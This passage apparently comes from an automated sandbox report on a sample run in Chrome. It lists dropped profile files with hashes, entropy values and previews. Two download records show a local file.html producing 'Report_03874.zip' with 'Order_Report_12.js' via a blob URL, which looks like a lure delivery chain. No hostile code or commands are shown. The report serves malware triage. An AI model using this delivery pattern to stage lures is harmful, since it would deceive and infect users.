                                                                                                                                                                SHA1:DEF2B8AD78C5DFF10D72FC9CFD4AEDEEAE05E70A
                                                                                                                                                                SHA-256:E40E63C0C4829CF3F580D5F7F7D7918889150711594F63383C9BC64B8E0307EE
                                                                                                                                                                SHA-512:76E43CB497923EC27D8712BF4D12BB07E4259F061B23E569907AED6F45DA0724B866707A28343883B65110CAAC8269CE07DCCB3E0C57F5C428233D563D9A10D6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:58.387 2198 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/MANIFEST-000001.2021/08/16-19:11:58.388 2198 Recovering log #3.2021/08/16-19:11:58.389 2198 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old4g (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):406
                                                                                                                                                                Entropy (8bit):5.314438233694713
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+VL+q2PlLN23iKKdKks8Y5JKKhdIFUtpvq1ZmwPv0klLVkwOlLN23iKKdKks8Yx:Qvy5KkkOrsFUtpi1/Pt5L5KkkOrzJ
                                                                                                                                                                MD5:4515A2824F5BF0B48951997558914454
                                                                                                                                                                SHA1:DEF2B8AD78C5DFF10D72FC9CFD4AEDEEAE05E70A
                                                                                                                                                                SHA-256:E40E63C0C4829CF3F580D5F7F7D7918889150711594F63383C9BC64B8E0307EE
                                                                                                                                                                SHA-512:76E43CB497923EC27D8712BF4D12BB07E4259F061B23E569907AED6F45DA0724B866707A28343883B65110CAAC8269CE07DCCB3E0C57F5C428233D563D9A10D6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:58.387 2198 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/MANIFEST-000001.2021/08/16-19:11:58.388 2198 Recovering log #3.2021/08/16-19:11:58.389 2198 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\TransportSecurityt (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):708
                                                                                                                                                                Entropy (8bit):5.564956104815177
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:YI9Mkq/HH+UAnIOVRWcNnYj+UAnIblTZCPXR7N+UAnI7PHt0FKO+UAnInQ:YIakq/HeU4nWaUxSh7wUhtVRUJQ
                                                                                                                                                                MD5:59E7A95B3EE22ADFEF4A42969734CE7B
                                                                                                                                                                SHA1:06A91D42BC129BD3E4273E7FCF43563FC15A1C3A
                                                                                                                                                                SHA-256:3A8F1C81B97F32A06FBD7B3A2200B2FC1DE77EA39CAC6E1AC3FBAF48045822E9
                                                                                                                                                                SHA-512:3BC57E33A4F26FCE59BDBEEE4E12704767AF6EC5366416B947D8CC42F627D708FA194DCB2BD9D2A2E2CDF72E35E29F9677E62ADDBD825985C0BEB280DD61E9CA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"expect_ct":[],"sts":[{"expiry":1654701301.094781,"host":"0J7rAWV0ouCFYJ9XrkDiKnAO1SshXJmLJE1SS3V8kDM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1623165301.094784},{"expiry":1654701298.912333,"host":"5EdUoB7YUY9zZV+2DkgVXgho8WUvp+D+6KpeUOhNQIM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1623165298.912336},{"expiry":1660702234.469224,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1629166234.469228},{"expiry":1654701300.827908,"host":"+ccWXqaoHJ9hfuXbleKV6FQUrBlyXAJ31BdqjNQJpHs=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1623165300.827911}],"version":2}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):131072
                                                                                                                                                                Entropy (8bit):0.0033616753448762224
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ImtVuVsDXlh76W9l/:IiVuQD6W9t
                                                                                                                                                                MD5:E38EE1D12286079453493BEF5985C1A9
                                                                                                                                                                SHA1:A8CC9AE6D75FED5054973538FA719E5F28B8AC62
                                                                                                                                                                SHA-256:09A14A922584D14AB6051BF56DA21F480B4AC3EE1AF66BA5CF64A68DC44746FA
                                                                                                                                                                SHA-512:79C3374BDE738E4DEBA9E6CDDFCBDD64B1CEF53F37D7BA96CC58E0DD276CB312953EE0DB1F355949C669F6DE8E7C21BBF583B9B1C3102793378AB152EB7B7BAC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):94208
                                                                                                                                                                Entropy (8bit):1.2247582786585376
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:5qOBhedSLH9QTJMbMB4n+ymGPF6P/1Vum:oOB6Sz9rn+ymyI/1Vum
                                                                                                                                                                MD5:6D741023AA69E2D4B124E4436F15E1A8
                                                                                                                                                                SHA1:781C1E2C45C02C80FF693CA15A02525F4BCC91FF
                                                                                                                                                                SHA-256:1D43AA9AAE20BA2B89AAF6101C93FAF4318116B0F0579A5EC04FC103AA978F19
                                                                                                                                                                SHA-512:5CEA97EF5DD03AC7C14F8748D5A00ABDB3CB32AB14ED14C1E765FA0086C68C2A1501AE790DE1B208B44DC375A02EAD586FE4814E08E1E55863E3A767B362748F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a060a3c3-36d4-4a84-adc3-1316937f3621.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PDP-11 pure executable not stripped - version 110
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):568
                                                                                                                                                                Entropy (8bit):6.145403243894182
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:2vLOBwZDHVOBGJBVzu7xwDwZobAiUBVz7iPBVzJP:2pZ7LJ/zu7o4oby/z7S/zd
                                                                                                                                                                MD5:146B5BEAA4E5CF1AC630DCD71D25C41B
                                                                                                                                                                SHA1:6E4055716544A8B8312CDA96EE4EAFDDC46ECF3C
                                                                                                                                                                SHA-256:A9828D42F74D9959FBEDE9E6F0BF7A97367EC03789317BE51E9ED4A083D5BB1C
                                                                                                                                                                SHA-512:02168217291C6AA72194452CAFD4AF6E29E29BD4C12620CAB07D86BC9F9F635358EB8227D0F144D78061529A49D69A88776F602D2EBE274AFD9686E5DC43A0F7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..........blob:null/a97e8999-2326-461e-9e14-63430d44f79c.". .2.=.'.u.....@Y..yD..`.vC.4..[....."4..blob:null/a97e8999-2326-461e-9e14-63430d44f79c.."."..*file:///C:/Users/user/Desktop/file.html..*.0.J.Report_03874.zipP.Z.en-US.....@..Order_Report_12.js...". ..B........o.$'.A.d..L....xR.U .8.@........(.0.8.@................blob:null/a97e8999-2326-461e-9e14-63430d44f79c.."*file:///C:/Users/user/Desktop/file.html0.9......wBB0..blob:null/a97e8999-2326-461e-9e14-63430d44f79c..?.*file:///C:/Users/user/Desktop/file.html..".0.9......wBP.X...................../
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\b9874609-0755-43b7-b6c7-7c31949a62f6.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3488
                                                                                                                                                                Entropy (8bit):4.950593325875801
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcsvlSrAN4qwoTw0pB/nw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGgrtqoonVuzip:n50nNmaRWMoiVmdeVtMVuzip
                                                                                                                                                                MD5:045C0EBF4C833D8A4A9EAA9723D5EB02
                                                                                                                                                                SHA1:EF28657CEFCE81216DFF3F608CD6310C4E6AC757
                                                                                                                                                                SHA-256:9B69787E9926249202EA2E9132E15FC8EBC39E4557F5AB3B753987413C050126
                                                                                                                                                                SHA-512:782CE44E864A54C38119AF18C3C297BF6458F69BCEBB1C638E39A7EE3C241E68DE16E6DEE5DB5C869296A4A6FF28A68D35FF1219653468B6130D9F0D51D046A6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gcm":{"product_category_for_subtypes":"com.chrome.windows"},"google":{"services":{"signin_scoped_device_id":"b94e6f13-7987-48dc-98f4-d60c75c3dbd7"}},"intl":{"selected_languages":"en-US,en"},"invalidation":{"per_sender_topics_to_handler":{"1013309121859":{},"8181035976":{}}},"media":{"device_id_salt":"099511625CE63697AD937561012FD491","engagement":{"schema_version":4}},
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\be0399a6-b972-4a8b-b9ea-55a64c829821.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):680
                                                                                                                                                                Entropy (8bit):6.098219793807082
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:wPDdYZDHVO5PDMJBVzuEu7xwDwZobUPDlBVztnePDYMJBVzeqBVzDBVzu+Nm:wbdYZ7KbMJ/zuh7o4obUbl/zVebhJ/zE
                                                                                                                                                                MD5:86101CF5F599E51247715E7C293FA942
                                                                                                                                                                SHA1:9CB75E8D675264F35D447E4008457987BB756903
                                                                                                                                                                SHA-256:8584D978FD02B4E33526B555585C6E2071F637FD04A0D4A0A35418803F901E81
                                                                                                                                                                SHA-512:3EA98F3741F0BEE3057BD54118F68E355D5A0D0C4DE4AC6F289FE2F5CE8FA6DC0DD52279D3351DEECC94BBBBCD0C28B55F24BD4D5864ED767D7D4713918DADDE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..........blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.". .2.=.'.u.....@Y..yD..`.vC.4..[....."4..blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.."."..*file:///C:/Users/user/Desktop/file.html..*.0.J.Report_03874 (1).zipP.Z.en-US.....@..Order_Report_12.js...". ..B........o.$'.A.d..L....xR.U .8.@........(.0.8.@................blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.."*file:///C:/Users/user/Desktop/file.html0.9..T...wBB0..blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8..i.*file:///C:/Users/user/Desktop/file.html.."*file:///C:/Users/user/Desktop/file.html0.9..J...wBP.X...?.*file:///C:/Users/user/Desktop/file.html..".0.9......wBP.X..................../
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\c7417b8f-4d55-45eb-8794-3ab1661c8641.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15154
                                                                                                                                                                Entropy (8bit):5.580392987991728
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OUptaLl7Xl1kXqKf/pUZNCgVLH2HfEKrU5m+m4k:4Lljl1kXqKf/pUZNCgVLH2HfzrU5XmL
                                                                                                                                                                MD5:5AF9337C8C8CC0DC77EDB919BCDA0BA9
                                                                                                                                                                SHA1:FBF5E771847BB6217EF8679568D354642FD04B08
                                                                                                                                                                SHA-256:6B43675406FF7B40A8CCAF2D98807BF2974268A7444511C902BE9289F7ADF1B3
                                                                                                                                                                SHA-512:5DFFA7577A3EBB8ADFE37C71A25E5AF7ACC2CC225FAE67BCD82F0DCF5972CB974E5FFDAE143A91747428A8E68C148FA50B65B26DF147F4D8D9B0B93F0A46F966
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cfc33a6c-cad8-4a25-bfae-c8ec58b2a2b5.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17957
                                                                                                                                                                Entropy (8bit):5.564879279388686
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OiztQLl7XQ1kXqKf/pUZNCgVLH2HfEarULdHGknWFm4w:GLljQ1kXqKf/pUZNCgVLH2HftrULBGHM
                                                                                                                                                                MD5:235682EDB9CF4723B948EC5F0E8D3681
                                                                                                                                                                SHA1:682190522561D7639E71CC3B00C17816D6874D67
                                                                                                                                                                SHA-256:11AB472B937F7BA50EE53A77D7AB5A98ACEEF122B9977019E338BB21A186B299
                                                                                                                                                                SHA-512:99A41CF7C43E12673AAEB24CAF0EBE07AB5F23C0553CFB92C3ED0D8F83A80A07E08DD29ACCE96E883EE7561339A44810DDA912452D22BDA597023CCF8E3D0CEF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1692
                                                                                                                                                                Entropy (8bit):4.946447236044282
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Y2TtwDHXPqn3zsOUZADs3LRLshVyvTYhbD:JTODHXin1qAQy+0hH
                                                                                                                                                                MD5:B3BCC192F8F6CA097CF62E784CE4C9E9
                                                                                                                                                                SHA1:D6961E9301B6CDF23543DF70E4841CF971504E09
                                                                                                                                                                SHA-256:2F5F9570050AB1BFE1CF856270FFCDD24B233BA1905A0BFCB7D9860388917C78
                                                                                                                                                                SHA-512:999C125EC277BD8B8DB25FDCCACDD4D7C7E6B562AE5C6600EA837D2E4B5D8FB7BF99D7CFA1E70C87663DA126B6C714F98A8E7990AA54E0580AE152ED5DC3846D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://update.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13276231834467595","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13276231834467598","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13276231834469104","port":443,"protocol_str":"quic"},{"advertised_alpns"
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000006.dbtmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Tv:1qIFj
                                                                                                                                                                MD5:AEFD77F47FB84FAE5EA194496B44C67A
                                                                                                                                                                SHA1:DCFBB6A5B8D05662C4858664F81693BB7F803B82
                                                                                                                                                                SHA-256:4166BF17B2DA789B0D0CC5C74203041D98005F5D4EF88C27E8281E00148CD611
                                                                                                                                                                SHA-512:B733D502138821948267A8B27401D7C0751E590E1298FDA1428E663CCD02F55D0D2446FF4BC265BDCDC61F952D13C01524A5341BC86AFC3C2CDE1D8589B2E1C3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000006.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT\ (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Tv:1qIFj
                                                                                                                                                                MD5:AEFD77F47FB84FAE5EA194496B44C67A
                                                                                                                                                                SHA1:DCFBB6A5B8D05662C4858664F81693BB7F803B82
                                                                                                                                                                SHA-256:4166BF17B2DA789B0D0CC5C74203041D98005F5D4EF88C27E8281E00148CD611
                                                                                                                                                                SHA-512:B733D502138821948267A8B27401D7C0751E590E1298FDA1428E663CCD02F55D0D2446FF4BC265BDCDC61F952D13C01524A5341BC86AFC3C2CDE1D8589B2E1C3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000006.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.615108480998806
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:tUK6KpoeSuG1Nj1Zm2vX9ZIKpoMwZVV889ZIKpoMJ6ShVWAv:m+oeSl1Zm2lZvoMw7Vp9ZvoMAmrv
                                                                                                                                                                MD5:63B01C2BF518EEC28D991FC1210DCC3A
                                                                                                                                                                SHA1:59BBCD2F87B22B36CCF5877718AE1FD00AB09FA1
                                                                                                                                                                SHA-256:24C99CBF78148D59124FC8B1CE58320E48170BF8C50E030A1B583E1102B3113B
                                                                                                                                                                SHA-512:D156D3FE89792413F2C21BAB08A12EC017752B68CC141DEC3B7DECC403916033D708AE160659922A1C13025A4822846369ADB128FD92634AAA5C7137360CE355
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:33.997 1c7c Recovering log #5.2021/08/16-19:10:34.235 1c7c Delete type=0 #5.2021/08/16-19:10:34.236 1c7c Delete type=3 #4.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldU (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.615108480998806
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:tUK6KpoeSuG1Nj1Zm2vX9ZIKpoMwZVV889ZIKpoMJ6ShVWAv:m+oeSl1Zm2lZvoMw7Vp9ZvoMAmrv
                                                                                                                                                                MD5:63B01C2BF518EEC28D991FC1210DCC3A
                                                                                                                                                                SHA1:59BBCD2F87B22B36CCF5877718AE1FD00AB09FA1
                                                                                                                                                                SHA-256:24C99CBF78148D59124FC8B1CE58320E48170BF8C50E030A1B583E1102B3113B
                                                                                                                                                                SHA-512:D156D3FE89792413F2C21BAB08A12EC017752B68CC141DEC3B7DECC403916033D708AE160659922A1C13025A4822846369ADB128FD92634AAA5C7137360CE355
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:33.997 1c7c Recovering log #5.2021/08/16-19:10:34.235 1c7c Delete type=0 #5.2021/08/16-19:10:34.236 1c7c Delete type=3 #4.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000006
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MPEG-4 LOAS
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):50
                                                                                                                                                                Entropy (8bit):4.988758439731456
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Ukk/vxQRDKIV8Eaewl:oO7Vaewl
                                                                                                                                                                MD5:78C55E45E9D1DC2E44283CF45C66728A
                                                                                                                                                                SHA1:88E234D9F7A513C4806845CE5C07E0016CF13352
                                                                                                                                                                SHA-256:7B69A2BEE12703825DC20E7D07292125180B86685D2D1B9FD097DF76FC6791EC
                                                                                                                                                                SHA-512:F2AD4594024871286B98A94223B8E7155C7934EF4EBB55F25A4A485A059F75B572D21BC96E9B48ED394BE8A41FE0208F7BFB6E28A79D75640C5B684F0C848FE3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: V........leveldb.BytewiseComparator.D...........
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\de085969-ac31-4115-8b2b-d90c7c7bf264.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4108
                                                                                                                                                                Entropy (8bit):5.00328268195565
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlprAGqKlQKHoTw0pB/Pw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGLrVrqooH:n8AdKINuaRWMoiVmde+VrMVXAiZw4
                                                                                                                                                                MD5:49339D264E2E6524CFC8EAE54EDB1EA8
                                                                                                                                                                SHA1:E7E959B1BB7CEF10FB229BA0F05560717CA4D320
                                                                                                                                                                SHA-256:AF4975729DF354F89A9CDA8AA980C2CE90932A6779DC14E089A820302F35701B
                                                                                                                                                                SHA-512:DCA04B386076322564034343E94B5C09BEA636DEBE72392654EE5ABF214EB51BA5693F3AC15EB682602B04A03C312A72B319CD24E988EAB96D03F3819D19F2B1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"5151071":1}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gaia_cookie":{"changed_time":1629166234.486642,"hash":"2jmj7l5rSw0yVb/vlWAYkK/YBwk=","last_list_accounts_data":"[\"gaia.l.a.r\",[]]"},"gcm":{"product_category_for_
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ef9b2414-78c4-44fb-be94-f36ebf6ad138.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):181072
                                                                                                                                                                Entropy (8bit):5.774426487043815
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:avbYFOZyYb37psk2SVlfN/qskVMxoZ51+XBY95/E5cCDd4QAOXxfzUBn2Y2l3P:a8Y7wqFTkVMO51+XBY96Nd4ByVuV2l3P
                                                                                                                                                                MD5:1B40AC9ABB964672109D49ABFCFE2717
                                                                                                                                                                SHA1:966E224F2887075825D42D2E7E0063BFAA81A99C
                                                                                                                                                                SHA-256:503149B1B47F8296DEDB800251DBD9AF614856F0D7E6AB1C03DBC90EBCE53674
                                                                                                                                                                SHA-512:00B50E49CAFD8246102BB460C7B96C20B50A2DDCB48A64C40D65901B517A2698DB9C5AA5EC7F143314DDB8D74624377F12A95C7F4D9FCE206473E8BBF126388B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):3353
                                                                                                                                                                Entropy (8bit):5.696135579258566
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:TxLV69gEUCHRHd3GUexxiBSRUotaPtfWU8N8WUeGfJSt1/LWUmbfZfp:qSzKexCSmZDpe8JSlm7Bp
                                                                                                                                                                MD5:58F8F2182EDEE4D3AE63E6E096DB3B4A
                                                                                                                                                                SHA1:C0191223E7ABB795BEF9F6E5249C7EE0107FF2F1
                                                                                                                                                                SHA-256:7FE1B9FDF3434B48AD77CB686F7AE77EB6FF7A14942958F119BED024618FD7C2
